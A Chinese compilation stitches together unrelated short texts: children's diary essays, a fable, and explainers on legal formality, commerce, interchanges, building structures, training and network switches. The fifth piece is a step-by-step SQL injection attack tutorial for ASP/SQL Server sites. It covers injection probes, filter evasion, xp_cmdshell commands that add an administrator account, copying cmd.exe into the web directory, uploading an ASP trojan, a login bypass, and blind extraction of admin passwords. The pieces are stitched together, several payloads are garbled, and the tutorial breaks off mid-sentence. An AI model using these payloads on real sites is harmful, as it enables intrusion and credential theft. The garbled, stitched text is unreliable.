下面是小编收集整理的什么是日记式作文,本文共15篇,供大家参考借鉴,希望可以帮助到有需要的朋友。本文原稿由网友“忘仔”提供。
篇1:日记式作文600字
今天阳光明媚,万里晴空飘着朵朵白云(萝莉时代作文最爱词语之一,貌似是从语文课本上山寨来的。此后,每每作文,必有此句),我和童鞋们去草莓基地摘草莓。
我们排着整齐的队伍坐上2路公交车来到了目的地。一下车就有一位老奶奶热情邀请我们去她家摘草莓。我们经过一大片菜地,有的童鞋说,韭菜是空心的吧?有的说,快看,那是葱!我们一看,不是葱是蒜。有的说,那是菠菜吧!明明是香菜好不好。我对他们彻底无语了,老师教育我们一定要多学农业知识,他们实在是太无知了。(PS,回来后,有人问我,草莓树有多高?==,我说,它趴在地上···)
走进温室大棚,首先映入眼帘(萝莉时代作文最中意的词语之二,显得很有文化)的是一垄一垄的草莓,个个都长着红彤彤的脸蛋(老师最中意的拟人修辞手法)。我们摘啊摘,每个人都摘了几斤回家了。回来的车上,一位老爷爷没有座位坐,我们让位子给他。他说:“谢谢!你们叫什么名字?”我们想起了雷锋叔叔做好事从来不留名,但是他把每件好事都写进了日记里。于是,我们高兴地回答:“老爷爷,不用谢,我们叫红领巾。”(一般写做好事,诸如扶老奶奶过马路、捡到钱包之类,留名的一定是红领巾,)
回来之后,我们就去CC家玩,大家一起吃饭、卡五星,有自称雀坛高手的为了赢大钱来了个诈和。CC说,乃们吃我的喝我的还赢我的钱···(想起经典段子,住我的房,开我的车,还打我的娃····)
我们度过了一个快乐而有意义的星期天,我将永远记住这一天.
篇2:日记式作文600字
暑假,我和妈妈到郑州小姨家玩。小姨带我的游泳馆游泳。我开心极啦!抱着小姨又蹦又跳。
游泳馆就在小姨的学校,还是室内馆,在地下一层。一到那,我就迫不及待地拿着泳衣和游泳圈拉着小姨跑,去了更衣室换了泳衣光着脚来到泳池。一进游泳馆内。“哇!好大的游泳池呀,跟学校的操场那么大。水很清很清,都可以看到池底。泳池里有叔叔、阿姨还有许多小朋友。小朋友们有的套着游泳圈扑腾水,有的趴在浮板上漂着,有的自己游着,还有胆大的小朋友站在台上往池中跳,“扑通”一声,溅起好多的水花,一会又从水中钻出来。看得我目瞪口呆,他们可真厉害呀!我也想赶快下水,妈妈和小姨先下水,让我套上游泳圈,扶着我下来。“哇!水真凉!”“妈妈我在水里漂起来了”我开心地叫起来。在水里漂着真好玩,我两腿一蹬一蹬的,感觉自己也游起来啦!
我看看小姨,小姨就像鱼一样自由的游过来游过去。看着看着,小姨头猛得往下一扎,不见了。“妈妈,小姨不见了!”我急得喊妈妈。“哗啦”一声,小姨突然从我面前出现,一下抱住我的腰。吓死我了!气得我伸手打小姨。“哈哈哈!”小姨大笑起来。“小姨,你教我呗!我也想学游泳!”“好!咱们带着游泳圈学游泳!包你会游!”我一听高兴极啦!小姨一本正经地说:“轩轩,咱们就学我独创的游泳圈式蛙泳游法!现在你两胳膊伸直,向两边拨水,两腿向内一伸一缩用力后蹬,就像青蛙蹬腿一样!试试吧!”我就按小姨说的试了一下,真的向前游了一点。我赶紧又伸胳膊蹬腿,往前迁移了一大截。“我会啦!我会游了!”我高兴的对妈妈说,妈妈只笑不说话。小姨笑着说:“轩轩,我的游泳圈式蛙泳游法很快学会了吧!”“就是!小姨真厉害!”我高兴地又游了起来!
在水中游泳真开心呀!
篇3:日记式作文600字
从前,有一匹老马妈妈刚生下一匹小马,她就给小马戴上铃铛,小马跑起来,铃铛就发出“叮呤、叮呤”的响声,声音是多么清脆啊!她还给小马起了一个非常好听的名字——叮呤。
冬天来了。有一天,老马出去觅食,过了好久也没有回来。小马想:妈妈,你该不会是迷路了吧?然后,小马使劲摇着脖子上的铃铛,希望妈妈能听到赶紧回来。过了一会儿,小马摇累了、困了,就把铃铛挂在洞口,他想:这样妈妈回来的话我第一时间就知道了。想着想着,小马便睡着了。
他梦见:妈妈回来碰到洞口的铃铛,发出“叮呤、叮呤”响声。他醒了,跑到洞口一看,原来,铃铛只是被寒风吹着发出“叮呤、叮呤”的响声。他失望地回到洞里继续等。
过了一会儿,又传来“叮呤、叮呤”的响声,他一看不得了啦,竟然是一头母老虎,但那是一头吃饱的母老虎。她说;“这里真暖和。”然后,她对小马说:“你给我出去,我要借你这里睡一觉。”小马无奈,只好站在洞口外耐心地等待着妈妈。老虎想到老马和自己的孩子都被狮子吃掉了,她看了看小马,眼前浮现出小老虎正在等她的情景。就用温柔的声音说:“你进来吧!”小马回答说:“不!我要站在这里等妈妈。”
这时,老虎嗅到了那只可恶的狮子的气味,就把小马轻轻地叼回洞里。自己跳出洞口,等待着狮子的到来。
狮子来了,老虎一吼,狮子一愣,也吼了一声。然后狮子说:“臭老虎,快让开,我的目标是小马,没工夫跟你玩。”老虎看着可怜的小马就想到了已入狮口的孩子,心疼不已,它决定要守护小马。于是她对狮子说:“你休想动小马一根汗毛。”说完他们便打了起来。可能是母爱的力量,让老虎战斗力激增,她竟然占了上风。狮子眼看情况不妙,只好仓皇逃走。临走时还留下一句话:“今天先饶过你们,但小马早晚是我的晚餐。”
老虎带着伤忍着疼痛回到洞里,对小马说:“如果你妈妈不回来,我就当你妈妈保护你好不好?”小马说:“好。”老虎笑了。
春天来了,随风传来一阵“叮呤、叮呤”的响声,只见两只身影在森林里欢快地奔跑,一大一小……
篇4:什么是要式行为
要式行为是指依照法律规定,必须采取一定形式或履行一定程序才能成立的行为,如:票据行为就是法定要式行为。
综合起来说就是:如法律规定某种民事法律行为必须采用某种形式,这种民事法律行为就称为要式民事行为。公民或者法人设立、变更、终止民事权利和民事义务,必须遵照法律要求的形式,其法律行为方能成立。凡不具备法律规定的形式的民事行为便是无效的。
一般来说,法律行为除法律有特别规定的以外,都是不要式行为
要式行为主要有以下几种情况:银行借款合同、工程承包建设合同、融资租赁合同、技术转让合同。技术开发合同。(物权法里的合同基本上属于要式合同)
要式行为的分类
第一,根据要式法律行为的主体不同,可分为要式民事法律行为和要式行政法律行为。要式民事法律行为是指设立、变更或废止某种民事法律关系必须履行某种特定形式才能成立和生效的民事法律行为。比如结婚,必须男女双方进行婚姻登记的行为。要式行政法律行为是指国家行政机关在行政管理活动中,必须依照法律规定的某种方式而实施,才能发生法律效果的行政行为,如行政处罚必须制作处罚决定书,劳动争议仲裁必须制作仲裁书等。因行政行为对公民的权利影响很大,为防止滥用行政权利,保护公民的合法权益,就必须注重一定的形式和方式。其有利之处在于:内容明确,行政行为的要式可以明确行政行为的内容,便于遵守和执行;便于明确责任,通过必要形式表明行政行为作出的时间、地点、过程和内容,作为判明责任的基础。
第二,根据要式法律行为是否由行为人自由决定为标准,可分为约定要式法律行为、法定要式法律行为以及约定和法定相结合而成的双重要式法律行为。
约定要式法律行为是指行为人设立、变更、废止某种民事法律关系,约定必须经过某种特定的形式才能成立的民事法律行为。如订立经济合同双方当事人约定,合同必须经过公证机关公证后才能成立。它要求约定的要式必须是合法的和能够实现的方式。约定要式法律行为都应当是发生在民事活动中,而行政法律行为当中采用约定要式的很少,根据行政法律行为的特点和调整对象来讲,只要是要式的都应当是法定的,如果采用约定的要式行政行为不利于对公民权益的保护。
法定要式法律行为是指国家立法机关或行政执法机关用法律、法规或规范性法律文件和具有法律约束力的规章、制度等形式而确定的某种法律行为必须经过某种特定的方式才能成立的法律行为,这就要求行为人必须履行法律规定的方式后,行为才能成立。行政要式法律行为都应当是法定的要式行政法律行为,而要式民事法律行为既可以是约定的也可以是法定的。
篇5:什么是注入式攻击
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多,但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根
据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据。
据统计,网站用ASP+Access或SQLServer的占70%以上,PHP+MySQ占L20%,其他的不足10%。在本文,以SQL-SERVER+ASP例说明SQL注入的原理、方法与过程。(PHP注入的文章由NB联盟的另一位朋友zwell撰写的有关文章)
SQL注入攻击的总体思路是:
l 发现SQL注入位置;
l 判断后台数据库类型;
l 确定XP_CMDSHELL可执行情况
l 发现WEB虚拟目录
l 上传ASP木马;
l 得到管理员权限;
一、SQL注入漏洞的判断
一般来说,SQL注入一般存在于形如:HTTP://xxx.xxx.xxx/abc.asp?id=XX等带有参数的ASP动态网页中,有时一个动态网页中可能只有一个参数,有时可能有N个参数,有时是整型参数,有时是字符串型参数,不能一概而论。总之只要是带有参数的动态网页且此网页访问了数据库,那么就有可能存在SQL注入。如果ASP程序员没有安全意识,不进行必要的字符过滤,存在SQL注入的可能性就非常大。
为了全面了解动态网页回答的信息,首选请调整IE的配置。把IE菜单-工具-Internet选项-高级-显示友好HTTP错误信息前面的勾去掉。
为了把问题说明清楚,以下以HTTP://xxx.xxx.xxx/abc.asp?p=YY为例进行分析,YY可能是整型,也有可能是字符串。
1、整型参数的判断
当输入的参数YY为整型时,通常abc.asp中SQL语句原貌大致如下:
select * from 表名 where 字段=YY,所以可以用以下步骤测试SQL注入是否存在。
①HTTP://xxx.xxx.xxx/abc.asp?p=YY';(附加一个单引号),此时abc.ASP中的SQL语句变成了
select * from 表名 where 字段=YY',abc.asp运行异常;
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=1, abc.asp运行正常,而且与HTTP://xxx.xxx.xxx/abc.asp?p=YY运行结果相同;
③HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=2, abc.asp运行异常;
如果以上三步全面满足,abc.asp中一定存在SQL注入漏洞。
2、字符串型参数的判断
当输入的参数YY为字符串时,通常abc.asp中SQL语句原貌大致如下:
select * from 表名 where 字段='YY',所以可以用以下步骤测试SQL注入是否存在。
①HTTP://xxx.xxx.xxx/abc.asp?p=YY';(附加一个单引号),此时abc.ASP中的SQL语句变成了
select * from 表名 where 字段=YY',abc.asp运行异常;
②HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1'='1', abc.asp运行正常,而且与HTTP://xxx.xxx.xxx/abc.asp?p=YY运行结果相同;
③HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1'='2', abc.asp运行异常;
如果以上三步全面满足,abc.asp中一定存在SQL注入漏洞。
3、特殊情况的处理
有时ASP程序员会在程序员过滤掉单引号等字符,以防止SQL注入。此时可以用以下几种方法试一试。
①大小定混合法:由于VBS并不区分大小写,而程序员在过滤时通常要么全部过滤大写字符串,要么全部过滤小写字符串,而大小写混合往往会被忽视。如用SelecT代替select,SELECT等;
②UNICODE法:在IIS中,以UNICODE字符集实现国际化,我们完全可以IE中输入的字符串化成UNICODE字符串进行输入。如+ =%2B,空格=%20 等;URLEncode信息参见附件一;
③ASCII码法:可以把输入的部分或全部字符全部用ASCII码代替,如U=chr(85),a=chr(97)等,ASCII信息参见附件二;
二、区分数据库服务器类型
一般来说,ACCESS与SQL-SERVER是最常用的数据库服务器,尽管它们都支持T-SQL标准,但还有不同之处,而且不同的数据库有不同的攻击方法,必须要区别对待。
1、利用数据库服务器的系统变量进行区分
SQL-SERVER有user,db_name等系统变量,利用这些系统值不仅可以判断SQL-SERVER,而且还可以得到大量有用信息。如:
① HTTP://xxx.xxx.xxx/abc.asp?p=YY and user>0 不仅可以判断是否是SQL-SERVER,而还可以得到当前连接到数据库的用户名
②HTTP://xxx.xxx.xxx/abc.asp?p=YY&n ... db_name()>0 不仅可以判断是否是SQL-SERVER,而还可以得到当前正在使用的数据库名;
2、利用系统表
ACCESS的系统表是msysobjects,且在WEB环境下没有访问权限,而SQL-SERVER的系统表是sysobjects,在WEB环境下有访问权限。对于以下两条语句:
①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)>0
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from msysobjects)>0
若数据库是SQL-SERVE,则第一条,abc.asp一定运行正常,第二条则异常;若是ACCESS则两条都会异常。
3、MSSQL三个关键系统表
sysdatabases系统表:Microsoft SQL Server 上的每个数据库在表中占一行。最初安装 SQL Server 时,sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 数据库的项。该表只存储在 master 数据库中。 这个表保存在master数据库中,这个表中保存的是什么信息呢?这个非常重要。他是 保存了所有的库名,以及库的ID和一些相关信息。
这里我把对于我们有用的字段名称和相关说明给大家列出来。name //表示库的名字。
dbid //表示库的ID,dbid从1到5是系统的。分别是:master、model、msdb、mssqlweb、tempdb 这五个库。用select * from master.dbo.sysdatabases 就可以查询出所有的库名。
Sysobjects:SQL-SERVER的每个数据库内都有此系统表,它存放该数据库内创建的所有对象,如约束、默认值、日志、规则、存储过程等,每个对象在表中占一行。以下是此系统表的字段名称和相关说明。
Name,id,xtype,uid,status:分别是对象名,对象ID,对象类型,所有者对象的用户ID,对象状态。
对象类型(xtype)。可以是下列对象类型中的一种:
C = CHECK 约束
D = 默认值或 DEFAULT 约束
F = FOREIGN KEY 约束
L = 日志
FN = 标量函数
IF = 内嵌表函数
P = 存储过程
PK = PRIMARY KEY 约束(类型是 K)
RF = 复制筛选存储过程
S = 系统表
TF = 表函数
TR = 触发器
U = 用户表
UQ = UNIQUE 约束(类型是 K)
V = 视图
X = 扩展存储过程
当xtype='U' and status>0代表是用户建立的表,对象名就是表名,对象ID就是表的ID值。
用: select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0 就可以列出库ChouYFD中所有的用户建立的表名。
syscolumns :每个表和视图中的每列在表中占一行,存储过程中的每个参数在表中也占一行。该表位于每个数据库中。主要字段有:
name ,id, colid :分别是字段名称,表ID号,字段ID号,其中的 ID 是 刚上我们用sysobjects得到的表的ID号。
用: select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFD这个库中,表的ID是123456789中的所有字段列表。
三、确定XP_CMDSHELL可执行情况
若当前连接数据的帐号具有SA权限,且master.dbo.xp_cmdshell扩展存储过程(调用此存储过程可以直接使用操作系统的shell)能够正确执行,则整个计算机可以通过以下几种方法完全控制,以后的所有步骤都可以省
1、HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... er>0 abc.asp执行异常但可以得到当前连接数据库的用户名(若显示dbo则代表SA)。
2、HTTP://xxx.xxx.xxx/abc.asp?p=YY ... me()>0 abc.asp执行异常但可以得到当前连接的数据库名。
3、HTTP://xxx.xxx.xxx/abc.asp?p=YY;exec master..xp_cmdshell “net user aaa bbb /add”-- (master是SQL-SERVER的主数据库;名中的分号表示SQL-SERVER执行完分号前的语句名,继续执行其后面的语句;“―”号是注解,表示其后面的所有内容仅为注释,系统并不执行)可以直接增加操作系统帐户aaa,密码为bbb。
4、HTTP://xxx.xxx.xxx/abc.asp?p=YY;exec master..xp_cmdshell “net localgroup administrators aaa /add”-- 把刚刚增加的帐户aaa加到administrators组中。
5、HTTP://xxx.xxx.xxx/abc.asp?p=YY;backuup database 数据库名 to disk='c:\\inetpub\\wwwroot\\save.db' 则把得到的数据内容全部备份到WEB目录下,再用HTTP把此文件下载(当然首选要知道WEB虚拟目录)。
6、通过复制CMD创建UNICODE漏洞
HTTP://xxx.xxx.xxx/abc.asp?p=YY;exe ... dbo.xp_cmdshell “copy c:\\winnt\\system32\\cmd.exe c:\\inetpub\\scripts\\cmd.exe” 便制造了一个UNICODE漏洞,通过此漏洞的利用方法,便完成了对整个计算机的控制(当然首选要知道WEB虚拟目录)。
四、发现WEB虚拟目录
只有找到WEB虚拟目录,才能确定放置ASP木马的位置,进而得到USER权限。有两种方法比较有效。
一是根据经验猜解,一般来说,WEB虚拟目录是:c:\\inetpub\\wwwroot; D:\\inetpub\\wwwroot; E:\\inetpub\\wwwroot等,而可执行虚拟目录是:c:\\inetpub\\scripts; D:\\inetpub\\scripts; E:\\inetpub\\scripts等,
二是遍历系统的目录结构,分析结果并发现WEB虚拟目录;
先创建一个临时表:temp
HTTP://xxx.xxx.xxx/abc.asp?p=YY;create&n ... mp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
接下来:
(1)我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert temp ... ter.dbo.xp_availablemedia;--
我们可以通过查询temp的内容来获得驱动器列表及相关信息
(2)我们可以利用xp_subdirs获得子目录列表,并存入temp表中:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(i ... dbo.xp_subdirs 'c:\\';--
(3)我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\\';--
这样就可以成功的浏览到所有的目录(文件夹)列表:
如果我们需要查看某个文件的内容,可以通过执行xp_cmdsell:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec ... nbsp;'type c:\\web\\index.asp';--
使用'bulk insert'语法可以将一个文本文件插入到一个临时表中。如:bulk insert temp(id) from 'c:\\inetpub\\wwwroot\\index.asp'
浏览temp就可以看到index.asp文件的内容了!通过分析各种ASP文件,可以得到大量系统信息,WEB建设与管理信息,甚至可以得到SA帐号的连接密码。
当然,如果xp_cmshell能够执行,我们可以用它来完成:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id)&nbs ... cmdshell 'dir c:\\';--
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id)&n ... p_cmdshell 'dir c:\\ *.asp /s/a';--
通过xp_cmdshell我们可以看到所有想看到的,包括W3svc
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec master.dbo.xp_cmdshe ... ub\\AdminScripts\\adsutil.vbs enum w3svc'
但是,如果不是SA权限,我们还可以使用
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\\';--
注意:
1、以上每完成一项浏览后,应删除TEMP中的所有内容,删除方法是:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;delete from temp;--
2、浏览TEMP表的方法是:(假设TestDB是当前连接的数据库名)
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top& ... nbsp;TestDB.dbo.temp )>0 得到表TEMP中第一条记录id字段的值,并与整数进行比较,显然abc.asp工作异常,但在异常中却可以发现id字段的值。假设发现的表名是xyz,则
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 id from ... ere id not in('xyz'))>0 得到表TEMP中第二条记录id字段的值。
五、上传ASP木马
所谓ASP木马,就是一段有特殊功能的ASP代码,并放入WEB虚拟目录的Scripts下,远程客户通过IE就可执行它,进而得到系统的USER权限,实现对系统的初步控制。上传ASP木马一般有两种比较有效的方法:
1、利用WEB的远程管理功能
许多WEB站点,为了维护的方便,都提供了远程管理的功能;也有不少WEB站点,其内容是对于不同的用户有不同的访问权限。为了达到对用户权限的控制,都有一个网页,要求用户名与密码,只有输入了正确的值,才能进行下一步的操作,可以实现对WEB的管理,如上传、下载文件,目录浏览、修改配置等。
因此,若获取正确的用户名与密码,不仅可以上传ASP木马,有时甚至能够直接得到USER权限而浏览系统,上一步的“发现WEB虚拟目录”的复杂操作都可省略。
用户名及密码一般存放在一张表中,发现这张表并读取其中内容便解决了问题。以下给出两种有效方法。
A、注入法:
从理论上说,认证网页中会有型如:
select * from admin where username='XXX' and password='YYY' 的语句,若在正式运行此句之前,没有进行必要的字符过滤,则很容易实施SQL注入。
如在用户名文本框内输入:abc' or 1=1-- 在密码框内输入:123 则SQL语句变成:
select * from admin where username='abc' or 1=1 and password='123' 不管用户输入任何用户名与密码,此语句永远都能正确执行,用户轻易骗过系统,获取合法身份。
B、猜解法:
基本思路是:猜解所有数据库名称,猜出库中的每张表名,分析可能是存放用户名与密码的表名,猜出表中的每个字段名,猜出表中的每条记录内容。
l 猜解所有数据库名称
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 0 因为 dbid 的值从1到5,是系统用了。所以用户自己建的一定是从6开始的。并且我们提交了 name>1 (name字段是一个字符型的字段和数字比较会出错),abc.asp工作异常,可得到第一个数据库名,同理把DBID分别改成7,8,9,10,11,12...就可得到所有数据库名。
以下假设得到的数据库名是TestDB。
l 猜解数据库中用户名表的名称
猜解法:此方法就是根据个人的经验猜表名,一般来说,user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,
systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。并通过语句进行判断
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from TestDB.dbo.表名)>0 若表名存在,则abc.asp工作正常,否则异常。如此循环,直到猜到系统帐号表的名称。
读取法:SQL-SERVER有一个存放系统核心信息的表sysobjects,有关一个库的所有表,视图等信息全部存放在此表中,而且此表可以通过WEB进行访问。
当xtype='U' and status>0代表是用户建立的表,发现并分析每一个用户建立的表及名称,便可以得到用户名表的名称,基本的实现方法是:
①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestD ... type='U' and status>0 )>0 得到第一个用户建立表的名称,并与整数进行比较,显然abc.asp工作异常,但在异常中却可以发现表的名称。假设发现的表名是xyz,则
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestDB.dbo.sysobjects& ... tatus>0 and name not in('xyz'))>0 可以得到第二个用户建立的表的名称,同理就可得到所有用建立的表的名称。
根据表的名称,一般可以认定那张表用户存放用户名及密码,以下假设此表名为Admin。
l 猜解用户名字段及密码字段名称
admin表中一定有一个用户名字段,也一定有一个密码字段,只有得到此两个字段的名称,才有可能得到此两字段的内容。如何得到它们的名称呢,同样有以下两种方法。
猜解法:此方法就是根据个人的经验猜字段名,一般来说,用户名字段的名称常用:username,name,user,account等。而密码字段的名称常用:password,pass,pwd,passwd等。并通过语句进行判断
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(字段名) from TestDB.dbo.admin)>0 “select count(字段名) from 表名”语句得到表的行数,所以若字段名存在,则abc.asp工作正常,否则异常。如此循环,直到猜到两个字段的名称。
读取法:基本的实现方法是
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select ... me(object_id('admin'),1) from TestDB.dbo.sysobjects)>0 。select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects是从sysobjects得到已知表名的第一个字段名,当与整数进行比较,显然abc.asp工作异常,但在异常中却可以发现字段的名称。把col_name(object_id('admin'),1)中的1依次换成2,3,4,5,6...就可得到所有的字段名称。
l 猜解用户名与密码
猜用户名与密码的内容最常用也是最有效的方法有:
ASCII码逐字解码法:虽然这种方法速度较慢,但肯定是可行的。基本的思路是先猜出字段的长度,然后依次猜出每一位的值。猜用户名与猜密码的方法相同,以下以猜用户名为例说明其过程。
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top&n ... nbsp;from TestDB.dbo.admin)=X(X=1,2,3,4,5,... n,username为用户名字段的名称,admin为表的名称),若x为某一值i且abc.asp运行正常时,则i就是第一个用户名的长度。如:当输入
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top ... e) from TestDB.dbo.admin)=8时abc.asp运行正常,则第一个用户名的长度为8
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的用户名长度之间,当m=1,2,3,...时猜测分别猜测第1,2,3,...位的值;n的值是1~9、a~z、A~Z的ASCII值,也就是1~128之间的任意值;admin为系统用户帐号表的名称),若n为某一值i且abc.asp运行正常时,则i对应ASCII码就是用户名某一位值。如:当输入
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,3,1)) from TestDB.dbo.admin)=80时abc.asp运行正常,则用户名的第三位为P(P的ASCII为80);
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,9,1)) from TestDB.dbo.admin)=33时abc.asp运行正常,则用户名的第9位为!(!的ASCII为80);
猜到第一个用户名及密码后,同理,可以猜出其他所有用户名与密码。注意:有时得到的密码可能是经MD5
篇6:什么是合作式商业
问题:什么是合作式商业?合作式商业是什么意思?
合作式商业(CollaborativeCommerce):C-商业是指一系列的合作式的,基于电子化的,在企业的内部员工、供应商、商业伙伴和客户之间的,在一个指定的贸易区域内的商业互动,
什么是合作式商业
,
所谓贸易区域可能是一个产业、产业细分、特定供应链或供应链细分。HacK50.com-是最好的入门资料网站
篇7:什么是子叶式立交?
,
但交通运行条件不如喇叭式好,正线存在交织,多用于苜蓿叶式立交的前期工程。布设时以正线下穿为宜。
篇8:什么是悬挂式结构?
,
由于受拉的钢丝束与受压的核心筒或拱受力明确,可充分发挥混凝土与高强钢丝的强度,所以这种结构往往具有自重轻、用钢量少、有效使用面积大等优点。特别是在建筑物的底层形成了开放的自由空间,可与周围地面环境连成一体综合布置,易于满足城市规划的要求。占地面积小是悬挂式结构的一大特点,这样可最大限度地减少新建筑物对邻近老建筑物的影响。这对旧城区的改造,或在密集的建筑群中建造新的高层建筑,具有特别重要的意义。
篇9:什么是顾问式培训
笔者所在的企业很少在外面进行公开课程的培训,因为我们认为公开课程的培训由于学员的层次、需求、职务、学习进度等因素,很难掌握整体效果,而讲师的培训由于讲义与时间的有限,也很难使培训使所有学员都满意(除非你讲授理念性、形势方面或共性方面的内容),而顾问式培训是在培训中做顾问,在顾问中做培训。我们一般在接受企业邀请需要培训时,先派讲师进入企业与有关人士沟通,如培训提纲、培训内容、培训目的等,同时以顾问的名义与企业商讨他们存在的问题、原因或讲授一些成功的经验供客户启发,必要的时候为了解培训需求应在企业里作一些调查,如此一来客户对我们培训的要点有了更深层次的了解与沟通、有时也及时转变培训内容,即完全按照该企业的个性问题设计培训提纲、运用案例及对现阶段该企业的水准有了较为全面的了解。在培训时注重解决哪些问题,他们的疑惑在哪里、方案有哪些、可能有哪些困难重重等等做到心知肚明。
在培训时,我们力戒或高谈阔论、或居高临下或条条框框,而是直入主题,如存在哪些问题、原因是什么,从环境、行业、政策等各方面(根据具体课程而定),做全面分析为“启”,再从解决方案入手,或比较或抛砖引玉或解剖现行做法,指出其或成功或不足的原因,同时希望学员充分讨论、研究以形成共识,此谓“承”,进入下一阶段即讨论解决的方案,以顾问式的引导、咨询、打疑及结合公司的实际情况,找出符合其个性特色的方案来,从阻力、方案、几种方式、流程、图表、监控、考核、量化、评估等各方面研讨,此为“转”,
最后就是合的过程,即随着培训的结束,培训后大家找到了共同的答案、原因。整个培训的过程就是一个咨询的过程。
在培训结束后,要完成培训这一商品的“售后服务”,即咨询的过程又是一个培训的过程,针对学员遇到的问题,进行咨询,而咨询不简单地给以一个咨询师的答案,而是从各方面进行论述,最后形成一个结论或与学员讨论后形成一个结论,而整个咨询的过程,就是一个培训的过程,问讯者不仅知道答案是什么,更知道原来的困惑是什么,为何有这样的困惑,通过咨询自己有怎样的理解,通过沟通有哪些心得等等。
由此可见,顾问式培训与客户更接近,培训的效果更明显,对讲师的要求尤其是操作性更高。
篇10:什么是堆叠式交换机
堆叠式交换机是一种类型的交换机,根据设计,这种交换机可以一台叠放在另一台的上面。这种交换机与机架式交换机不同,可以放置在网络机柜中,也可以单独摆放。堆叠式交换机的功能根据厂商和平台的不同而有所不同。许多堆叠式交换机不支持服务质量(QoS)、多播和虚拟局域网管理等高级功能。PureData和DLink这两家公司生产的堆叠式交换机支持某种形式的服务质量规则。对于你需要的功能,请参阅厂商的技术支持说明。
对于访问层(access layer)交换技术来说,要选择支持虚拟局域网、安全传输协议(STP)和IGMP(互联网组播协议)的交换机。支持服务质量在这种情况下是附加的好处,不必刻意追求。我强烈建议在你的交换机的集合点应用QoS。这是服务质量功能、时序安排和队列最需要的地方。
补充知识:
交换机堆叠是通过厂家提供的一条专用连接电缆,从一台交换机的“UP”堆叠端口直接连接到另一台交换机的“DOWN”堆叠端口,
以实现单台交换机端口数的扩充。一般交换机能够堆叠4~9台。
为了使交换机满足大型网络对端口的数量要求,一般在较大型网络中都采用交换机的堆叠方式来解决。要注意的是只有可堆叠交换机才具备这种端口,所谓可堆叠交换机,就是指一个交换机中一般同时具有“UP”和“DOWN”堆叠端口。当多个交换机连接在一起时,其作用就像一个模块化交换机一样,堆叠在一起交换机可以当作一个单元设备来进行管理。一般情况下,当有多个交换机堆叠时,其中存在一个可管理交换机,利用可管理交换机可对此可堆叠式交换机中的其他“独立型交换机”进行管理。可堆叠式交换机可非常方便地实现对网络的扩充,是新建网络时最为理想的选择。
堆叠中的所有交换机可视为一个整体的交换机来进行管理,也就是说,堆叠中所有的交换机从拓扑结构上可视为一个交换机。堆栈在一起的交换机可以当作一台交换机来统一管理。交换机堆叠技术采用了专门的管理模块和堆栈连接电缆,这样做的好处是,一方面增加了用户端口,能够在交换机之间建立一条较宽的宽带链路,这样每个实际使用的用户带宽就有可能更宽(只有在并不是所有端口都在使用情况下)。另一方面多个交换机能够作为一个大的交换机,便于统一管理。
篇11:日记式英语作文高一
Today is a rainy day. My father took me to school in the morning, because the bus was too crowded. On the way to school, my father asked me about my study. I said I worked very hard in school.
In the class, I listened to the teachers carefully and I often answered the questions. And I had good relationship with my classmates. I was happy to play with them. They were very friendly. My fathered was happy to hear that. He hoped I could be happy in the school.
篇12:日记式英语作文高一
Keeping a diary in English is an effective way to improve our level of English.It can practice our way to think in English; it provides a chance for us to understand and use English words and phrases as well as idioms better; it a good way to practice and improve our writing skills.
